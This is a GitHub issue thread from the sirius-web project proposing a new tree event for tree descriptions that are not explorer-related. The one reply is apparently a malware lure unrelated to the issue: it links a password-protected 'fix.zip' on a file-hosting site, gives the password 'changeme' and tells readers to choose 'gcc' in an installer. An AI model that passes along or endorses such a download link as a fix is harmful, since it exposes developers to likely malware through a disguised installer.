### ISSUE TITLE
Add a new tree event to handle tree description which are not explorer-related

### ISSUE THREAD

**Issue by jerome-obeo** [eclipse-sirius/sirius-web#3882]
* [x] **I have checked that this feature has not yet been suggested by someone else.**

At the moment, sirius web only provides TreeDescription for explorers.
First, we refactored existing code to reflect this reality (issue https://github.com/eclipse-sirius/sirius-web/issues/3875).

Now, in this issue, we introduce a new tree event that allows us to handle tree descriptions that are not explorer-related.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
